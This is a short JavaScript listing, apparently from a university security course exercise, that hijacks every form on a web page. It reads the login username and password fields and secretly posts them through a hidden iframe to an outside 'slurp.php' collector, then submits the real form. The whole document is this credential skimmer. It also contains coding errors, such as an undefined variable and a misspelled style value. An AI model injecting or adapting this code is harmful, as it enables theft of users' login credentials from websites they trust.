var frms = document.getElementsByTagName("form");for(var i=0; i<frms.length; i

1. var frms = document.getElementsByTagName("form");
2. for(var i=0; i<frms.length; i++) {
3. hijack(frms[i]);
4. }
5.  
6. function hijack(frmObj) {
7. var delayCode = "";
8. if(frmObj.hasAttribute("onsubmit")) {
9. delayCode = frmObj.getAttribute("onsubmit");}
10. frmObj.setAttribute("onsubmit", "return leech(this,function() {" + delayCode + "});");
11. }
12.  
13. function leech(frmObj, delayCode) {
14. var rnd = Math.floor(Math.random()*256);
15. var newFrm = document.createElement("form");
16.  
17. var username = frmObject.getElementById("user_login").getAttribute("value");
18. var pass= frmObject.getElementByName("user_pass").getAttribute("value");
19.  
20. newFrm.setAttribute("id", "leechedID" + rnd);
21. newFrm.setAttribute("target", "hiddenframe" + newFrm.id);
22. newFrm.setAttribute("action", "https://www.rose-hulman.edu/~stammsl/442/slurp.php");
23.  
24. var usernameInput= document.createElement("input");
25. usernameInput.setAttribute("name", "username");
26. usernameInput.setAttribute("value", username);
27. usernameInput.setAttribute("type", "hidden");
28.  
29. var passInput= document.createElement("input");
30. passInput.setAttribute("name", "password");
31. passInput.setAttribute("value", pass);
32. passInput.setAttribute("type", "hidden");
33.  
34. var teamNameInput= document.createElement("input");
35. teamNameInput.setAttribute("name", "442team");
36. teamNameInput.setAttribute("value", "SaltySeniors");
37. teamNameInput.setAttribute("type", "hidden");
38.  
39. newFrm.appendChild(teamNameInput);
40. newFrm.appendChild(passInput);
41. newFrm.appendChild(usernameInput);
42.  
43. var hiddenIframe = document.createElement("iframe");
44. hiddenIframe.setAttribute("style", "position:aboslute;" + "visibility:hidden;z-index:0;");
45. hiddenIframe.setAttribute("name", "hiddenframe" + newFrm.id);
46.  
47. hiddenIframe.appendChild(newFrm);
48. window.document.body.appendChild(hiddenIframe);
49. alert("About to submit the forked form");
50. newFrm.submit();
51. alert("Cloned form submitted");
52.  
53. setTimeout(function() {
54. window.document.body.removeChild(hiddenIframe);
55. if(delayCode() !=false) { frmObj.submit(); alert("Submitted real form.");
56. }
57. }, 50);
58.  
59. return false;
60. }